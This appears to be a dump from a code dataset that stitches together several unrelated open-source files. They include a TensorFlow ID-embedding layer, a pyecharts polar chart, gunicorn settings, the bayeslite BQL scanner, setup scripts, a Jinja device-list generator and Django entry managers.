user_id_fields: list(Tensor(dtype=string)) List of user fields. Each has shape=[batch_size]
:return: doc_ftrs, user_ftrs
"""
doc_id_fields = inputs.get(InputFtrType.DOC_ID_COLUMN_NAMES, None)
user_id_fields = inputs.get(InputFtrType.USER_ID_COLUMN_NAMES, None)
if self._num_id_fields == 0:
assert doc_id_fields is None and user_id_fields is None, "Document ID fields and user ID fields must be None when there's no id field"
user_ftrs = self.apply_embed_on_user_id(user_id_fields) if user_id_fields is not None else None
doc_ftrs = self.apply_embed_on_doc_id(doc_id_fields) if doc_id_fields is not None else None
return doc_ftrs, user_ftrs
def apply_embedding(self, inputs):
"""Applies embedding on give inputs
:param inputs Tensor(dtype=string) Shape=[batch_size]
:return Tensor(dtype=string) Shape=[batch_size, sentence_len, num_units_for_id_ftr]
"""
embedding_result = self.embedding({
InternalFtrType.SENTENCES: inputs,
InternalFtrType.NUM_CLS: self.num_cls_sep,
InternalFtrType.NUM_SEP: self.num_cls_sep,
InternalFtrType.MIN_LEN: self.min_len,
InternalFtrType.MAX_LEN: self.max_len,
})
seq_length = embedding_result[InternalFtrType.LENGTH]
max_seq_len = tf.math.reduce_max(seq_length)
seq_mask = tf.expand_dims(tf.sequence_mask(seq_length, max_seq_len, dtype=tf.float32), axis=-1)
seq_length = tf.expand_dims(tf.cast(seq_length, dtype=tf.dtypes.float32), axis=-1)
user_id_embeddings = embedding_result[InternalFtrType.EMBEDDED]
sum_user_id_embedding = tf.reduce_sum(
input_tensor=user_id_embeddings * seq_mask, axis=1) # [batch_size, num_units_for_id_ftr]
user_id_avg_embedding = tf.math.divide_no_nan(sum_user_id_embedding, seq_length) # [batch_size, num_units_for_id_ftr]
return user_id_avg_embedding
def apply_embed_on_user_id(self, user_id_fields):
"""Applies embedding lookup and averaging for user id features
:return Tensor Shape=[batch_size, num_user_id_fields, num_units_for_id_ftr]
"""
user_ftrs = []
for i, user_field in enumerate(user_id_fields):
user_id_avg_embedding = self.apply_embedding(user_field)
user_ftrs.append(user_id_avg_embedding)
return tf.stack(user_ftrs, axis=1)
def apply_embed_on_doc_id(self, doc_id_fields):
"""Applies embedding lookup and averaging for doc id features
:return Tensor Shape=[batch_size, max_group_size, num_doc_id_fields, num_units_for_id_ftr]
"""
doc_ftrs = []
for i, doc_field in enumerate(doc_id_fields):
doc_field_shape = tf.shape(doc_field)
reshape_doc_field = tf.reshape(doc_field, shape=[doc_field_shape[0] * doc_field_shape[1]])
doc_id_avg_embedding = self.apply_embedding(reshape_doc_field)
doc_id_avg_embedding = tf.reshape(doc_id_avg_embedding, shape=[doc_field_shape[0], doc_field_shape[1], self.id_ftr_size])
doc_ftrs.append(doc_id_avg_embedding)
return tf.stack(doc_ftrs, axis=2)
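# --- Hedged usage sketch (comment only; not part of the upstream module) ---
# The tensors and the embedding parameter below are assumptions for illustration;
# the real configuration objects come from detext's argument parsing.
#
#   layer = IdEmbedLayer(num_id_fields=2,
#                        embedding_layer_param=my_embedding_param,      # hypothetical config object
#                        embedding_hub_url_for_id_ftr=None)
#   doc_ftrs, user_ftrs = layer({
#       InputFtrType.DOC_ID_COLUMN_NAMES: [doc_id_strings],    # string tensor, shape [batch_size, max_group_size]
#       InputFtrType.USER_ID_COLUMN_NAMES: [user_id_strings],  # string tensor, shape [batch_size]
#   })
#   # doc_ftrs:  [batch_size, max_group_size, num_doc_id_fields, num_units_for_id_ftr]
#   # user_ftrs: [batch_size, num_user_id_fields, num_units_for_id_ftr]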
|
Polar/polar_flower.py | pyecharts/pyecharts_gallery | 759 | 12664900 | import math
from pyecharts import options as opts
from pyecharts.charts import Polar
data = []
for i in range(361):
t = i / 180 * math.pi
r = math.sin(2 * t) * math.cos(2 * t)
data.append([r, i])
c = (
Polar()
.add_schema(angleaxis_opts=opts.AngleAxisOpts(start_angle=0, min_=0))
.add("flower", data, label_opts=opts.LabelOpts(is_show=False))
.set_global_opts(title_opts=opts.TitleOpts(title="Polar-Flower"))
.render("polar_flower.html")
)
|
ichnaea/webapp/gunicorn_settings.py | mikiec84/ichnaea | 348 | 12664904 | """
Contains :ref:`Gunicorn configuration settings <gunicorn:settings>` and
hook functions.
"""
# Disable keep-alive
keepalive = 0
def post_worker_init(worker):
worker.wsgi(None, None)
def worker_exit(server, worker):
from ichnaea.webapp.app import worker_exit
worker_exit(server, worker)
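# Usage note (comment only): gunicorn can load a settings module like this one
# through its -c flag, e.g. ``gunicorn -c python:ichnaea.webapp.gunicorn_settings <app>``;
# the application path is deployment-specific and shown here only as a placeholder.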
|
src/scan.py | almartin82/bayeslite | 964 | 12664905 | # -*- coding: utf-8 -*-
# Copyright (c) 2010-2016, MIT Probabilistic Computing Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import StringIO
import bayeslite.grammar as grammar
import bayeslite.plex as Plex
from bayeslite.util import casefold
'''
grep -o 'K_[A-Z][A-Z0-9_]*' < grammar.y | sort -u | awk '
{
sub("^K_", "", $1)
# All keywords are US-ASCII, so tolower is the same as casefold.
printf(" \"%s\": grammar.K_%s,\n", tolower($1), $1)
}'
'''
keywords = {
"accuracy": grammar.K_ACCURACY,
"add": grammar.K_ADD,
"all": grammar.K_ALL,
"alter": grammar.K_ALTER,
"analyze": grammar.K_ANALYZE,
"and": grammar.K_AND,
"as": grammar.K_AS,
"asc": grammar.K_ASC,
"begin": grammar.K_BEGIN,
"between": grammar.K_BETWEEN,
"btable": grammar.K_BTABLE,
"by": grammar.K_BY,
"case": grammar.K_CASE,
"cast": grammar.K_CAST,
"checkpoint": grammar.K_CHECKPOINT,
"collate": grammar.K_COLLATE,
"column": grammar.K_COLUMN,
"columns": grammar.K_COLUMNS,
"commit": grammar.K_COMMIT,
"conf": grammar.K_CONF,
"confidence": grammar.K_CONFIDENCE,
"context": grammar.K_CONTEXT,
"correlation": grammar.K_CORRELATION,
"create": grammar.K_CREATE,
"default": grammar.K_DEFAULT,
"density": grammar.K_DENSITY,
"dependence": grammar.K_DEPENDENCE,
"desc": grammar.K_DESC,
"distinct": grammar.K_DISTINCT,
"drop": grammar.K_DROP,
"else": grammar.K_ELSE,
"end": grammar.K_END,
"escape": grammar.K_ESCAPE,
"estimate": grammar.K_ESTIMATE,
"existing": grammar.K_EXISTING,
"exists": grammar.K_EXISTS,
"explicit": grammar.K_EXPLICIT,
"for": grammar.K_FOR,
"from": grammar.K_FROM,
"generator": grammar.K_GENERATOR,
"given": grammar.K_GIVEN,
"glob": grammar.K_GLOB,
"group": grammar.K_GROUP,
"guess": grammar.K_GUESS,
"having": grammar.K_HAVING,
"hypothetical": grammar.K_HYPOTHETICAL,
"if": grammar.K_IF,
"ignore": grammar.K_IGNORE,
"in": grammar.K_IN,
"infer": grammar.K_INFER,
"information": grammar.K_INFORMATION,
"initialize": grammar.K_INITIALIZE,
"is": grammar.K_IS,
"isnull": grammar.K_ISNULL,
"iteration": grammar.K_ITERATION,
"iterations": grammar.K_ITERATIONS,
"latent": grammar.K_LATENT,
"like": grammar.K_LIKE,
"limit": grammar.K_LIMIT,
"match": grammar.K_MATCH,
"minute": grammar.K_MINUTE,
"minutes": grammar.K_MINUTES,
"model": grammar.K_MODEL,
"modeled": grammar.K_MODELED,
"modelled": grammar.K_MODELLED,
"models": grammar.K_MODELS,
"mutual": grammar.K_MUTUAL,
"not": grammar.K_NOT,
"notnull": grammar.K_NOTNULL,
"null": grammar.K_NULL,
"of": grammar.K_OF,
"offset": grammar.K_OFFSET,
"or": grammar.K_OR,
"order": grammar.K_ORDER,
"pairwise": grammar.K_PAIRWISE,
"population": grammar.K_POPULATION,
"predict": grammar.K_PREDICT,
"predictive": grammar.K_PREDICTIVE,
"probability": grammar.K_PROBABILITY,
"pvalue": grammar.K_PVALUE,
"regexp": grammar.K_REGEXP,
"regress": grammar.K_REGRESS,
"relevance": grammar.K_RELEVANCE,
"rename": grammar.K_RENAME,
"rollback": grammar.K_ROLLBACK,
"row": grammar.K_ROW,
"rows": grammar.K_ROWS,
"samples": grammar.K_SAMPLES,
"schema": grammar.K_SCHEMA,
"second": grammar.K_SECOND,
"seconds": grammar.K_SECONDS,
"select": grammar.K_SELECT,
"set": grammar.K_SET,
"similarity": grammar.K_SIMILARITY,
"simulate": grammar.K_SIMULATE,
"stattype": grammar.K_STATTYPE,
"stattypes": grammar.K_STATTYPES,
"table": grammar.K_TABLE,
"temp": grammar.K_TEMP,
"temporary": grammar.K_TEMPORARY,
"the": grammar.K_THE,
"then": grammar.K_THEN,
"to": grammar.K_TO,
"unset": grammar.K_UNSET,
"using": grammar.K_USING,
"value": grammar.K_VALUE,
"values": grammar.K_VALUES,
"variable": grammar.K_VARIABLE,
"variables": grammar.K_VARIABLES,
"when": grammar.K_WHEN,
"where": grammar.K_WHERE,
"with": grammar.K_WITH,
"within": grammar.K_WITHIN,
}
def scan_name(_scanner, text):
return keywords.get(text) or keywords.get(casefold(text)) or \
grammar.L_NAME;
def scan_integer(scanner, text):
scanner.produce(grammar.L_INTEGER, int(text, 10))
def scan_float(scanner, text):
# XXX Consider a system-independent representation of floats which
# we can pass through to the SQL engine. (E.g., for the benefit
# of SQLite4 which will use decimal floating-point arithmetic
# instead of binary floating-point arithmetic.)
scanner.produce(grammar.L_FLOAT, float(text))
def scan_numpar_next(scanner, text):
# Numbered parameters are 1-indexed.
scanner.n_numpar += 1
scanner.produce(grammar.L_NUMPAR, scanner.n_numpar)
def scan_numpar(scanner, text):
assert text[0] == '?'
if 20 < len(text): # 2^64 < 10^20
scan_bad(scanner, text)
else:
n = int(text[1:])
if n == 0:
# Numbered parameters are 1-indexed.
scanner.produce(-1, text)
else:
scanner.n_numpar = max(n, scanner.n_numpar)
scanner.produce(grammar.L_NUMPAR, n)
def scan_nampar(scanner, text):
text = casefold(text)
n = None
if text in scanner.nampar_map:
n = scanner.nampar_map[text]
else:
# Numbered parameters are 1-indexed.
scanner.n_numpar += 1
n = scanner.n_numpar
scanner.nampar_map[text] = n
scanner.produce(grammar.L_NAMPAR, (n, text))
def scan_bad(scanner, text):
scanner.produce(-1, text) # error
def scan_qname_start(scanner, text):
assert text == '"'
scan_quoted_start(scanner, text, "QNAME")
def scan_qname_end(scanner, text):
scan_quoted_end(scanner, text, grammar.L_NAME)
def scan_string_start(scanner, text):
assert text == "'"
scan_quoted_start(scanner, text, "STRING")
def scan_string_end(scanner, text):
scan_quoted_end(scanner, text, grammar.L_STRING)
def scan_quoted_start(scanner, text, state):
assert scanner.stringio is None
assert scanner.stringquote is None
scanner.stringio = StringIO.StringIO()
scanner.begin(state)
def scan_quoted_text(scanner, text):
assert scanner.stringio is not None
scanner.stringio.write(text)
def scan_quoted_quote(scanner, text):
assert scanner.stringio is not None
assert text[0] == text[1]
scanner.stringio.write(text[0])
def scan_quoted_end(scanner, text, token):
assert scanner.stringio is not None
string = scanner.stringio.getvalue()
scanner.stringio.close()
scanner.stringio = None
scanner.produce(token, string)
scanner.begin("")
class BQLScanner(Plex.Scanner):
line_comment = Plex.Str("--") + Plex.Rep(Plex.AnyBut("\n"))
whitespace = Plex.Any("\f\n\r\t ")
# XXX Support non-US-ASCII Unicode text.
letter = Plex.Range("azAZ")
digit = Plex.Range("09")
digits = Plex.Rep(digit)
digits1 = Plex.Rep1(digit)
hexit = digit | Plex.Range("afAF")
hexits1 = Plex.Rep1(hexit)
integer_dec = digits1
integer_hex = Plex.Str("0x", "0X") + hexits1
dot = Plex.Str('.')
intfrac = digits1 + dot + digits
fraconly = dot + digits1
optsign = Plex.Opt(Plex.Any('+-'))
expmark = Plex.Any('eE')
exponent = expmark + optsign + digits1
optexp = Plex.Opt(exponent)
float_dec = ((intfrac | fraconly) + optexp) | (digits1 + exponent)
name_special = Plex.Any("_$")
name = (letter | name_special) + Plex.Rep(letter | digit | name_special)
lexicon = Plex.Lexicon([
(whitespace, Plex.IGNORE),
(line_comment, Plex.IGNORE),
(Plex.Str(";"), grammar.T_SEMI),
(Plex.Str("{"), grammar.T_LCURLY),
(Plex.Str("}"), grammar.T_RCURLY),
(Plex.Str("("), grammar.T_LROUND),
(Plex.Str(")"), grammar.T_RROUND),
(Plex.Str("+"), grammar.T_PLUS),
(Plex.Str("-"), grammar.T_MINUS),
(Plex.Str("*"), grammar.T_STAR),
(Plex.Str("/"), grammar.T_SLASH),
(Plex.Str("%"), grammar.T_PERCENT),
(Plex.Str("="), grammar.T_EQ),
(Plex.Str("=="), grammar.T_EQ),
(Plex.Str("<"), grammar.T_LT),
(Plex.Str("<>"), grammar.T_NEQ),
(Plex.Str("<="), grammar.T_LEQ),
(Plex.Str(">"), grammar.T_GT),
(Plex.Str(">="), grammar.T_GEQ),
(Plex.Str("<<"), grammar.T_LSHIFT),
(Plex.Str(">>"), grammar.T_RSHIFT),
(Plex.Str("!="), grammar.T_NEQ),
(Plex.Str("|"), grammar.T_BITIOR),
(Plex.Str("||"), grammar.T_CONCAT),
(Plex.Str(","), grammar.T_COMMA),
(Plex.Str("&"), grammar.T_BITAND),
(Plex.Str("~"), grammar.T_BITNOT),
(Plex.Str("."), grammar.T_DOT),
(Plex.Str("?"), scan_numpar_next),
(Plex.Str("?") + integer_dec,
scan_numpar),
(Plex.Str(":") + name, scan_nampar),
(Plex.Str("@") + name, scan_nampar),
(Plex.Str("$") + name, scan_nampar),
(Plex.Str("'"), scan_string_start),
(Plex.Str('"'), scan_qname_start),
(name, scan_name),
(integer_dec, scan_integer),
(integer_hex, scan_integer),
(float_dec, scan_float),
(integer_dec + name, scan_bad),
(integer_hex + name, scan_bad),
(float_dec + name, scan_bad),
(Plex.AnyChar, scan_bad),
Plex.State("STRING", [
(Plex.Str("'"), scan_string_end),
(Plex.Str("''"), scan_quoted_quote),
(Plex.Rep1(Plex.AnyBut("'")), scan_quoted_text),
]),
Plex.State("QNAME", [
(Plex.Str('"'), scan_qname_end),
(Plex.Str('""'), scan_quoted_quote),
(Plex.Rep1(Plex.AnyBut('"')), scan_quoted_text),
]),
])
def __init__(self, f, context):
Plex.Scanner.__init__(self, self.lexicon, f, context)
self.stringio = None
self.stringquote = None
self.n_numpar = 0
self.nampar_map = {}
def produce(self, token, value=None):
if token is None: # EOF
token = 0
Plex.Scanner.produce(self, token, value)
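# --- Hedged usage sketch (comment only; not part of the upstream module) ---
# Assumes Plex's standard Scanner.read(), which yields the (token, value)
# pairs emitted by produce(); EOF is produced as token 0 above.
#
#   scanner = BQLScanner(StringIO.StringIO('SELECT 42;'), '<input>')
#   while True:
#       token, value = scanner.read()
#       if token == 0:
#           break
#       print token, value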
|
setup.py | danieldaeschle/swapy | 834 | 12664959 | from setuptools import setup
setup(
name='swapy',
version='0.2.2',
description='Easy and modular web development',
author='<NAME>',
author_email='<EMAIL>',
url='https://github.com/danieldaeschle/swapy',
packages=['swapy'],
install_requires=['werkzeug', 'jinja2'],
license='MIT'
)
|
tools/gen_nvm_devices.py | Neradoc/circuitpython | 3,010 | 12664964 | import sys
import cascadetoml
import pathlib
import typer
from jinja2 import Template
def main(input_template: pathlib.Path, output_path: pathlib.Path):
flashes = cascadetoml.filter_toml(pathlib.Path("../../data/nvm.toml"), [])
template = Template(input_template.read_text())
settings = {"nvms": []}
for flash in flashes["nvm"]:
if "sku" not in flash or flash["sku"] == flash["manufacturer"]:
continue
settings["nvms"].append(dict(flash))
output_path.write_text(template.render(settings))
if __name__ == "__main__":
typer.run(main)
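# Example invocation (comment only; both paths are illustrative):
#   python gen_nvm_devices.py nvm_devices.h.jinja ../gen/nvm_devices.h
# typer maps the two positional arguments onto input_template and output_path.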
|
setup/nuke/nuke_path/menu.py | bumpybox/core | 168 | 12664968 | import avalon.api
import avalon.nuke
avalon.api.install(avalon.nuke)
|
dictionary/models/managers/entry.py | ankitgc1/django-sozluk-master | 248 | 12665016 | <filename>dictionary/models/managers/entry.py
from django.db import models
from django.db.models import Q
class EntryManager(models.Manager):
# Includes ONLY the PUBLISHED entries by NON-NOVICE authors
def get_queryset(self):
return super().get_queryset().exclude(Q(is_draft=True) | Q(author__is_novice=True))
class EntryManagerAll(models.Manager):
# Includes ALL entries (entries by novices, drafts)
pass
class EntryManagerOnlyPublished(models.Manager):
# Includes ONLY the PUBLISHED entries (entries by NOVICE users still visible)
def get_queryset(self):
return super().get_queryset().exclude(is_draft=True)
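# Hedged usage sketch (comment only; the attribute names below are illustrative,
# the real Entry model attaches these managers under its own names):
#
#   class Entry(models.Model):
#       ...
#       objects = EntryManager()                         # published, non-novice only
#       objects_all = EntryManagerAll()                  # everything, including drafts
#       objects_published = EntryManagerOnlyPublished()  # published, novices included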
|
tests/CompileTests/Python_tests/test2011_007.py | maurizioabba/rose | 488 | 12665018 | <gh_stars>100-1000
def foo(bar):
bar + 1
|
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.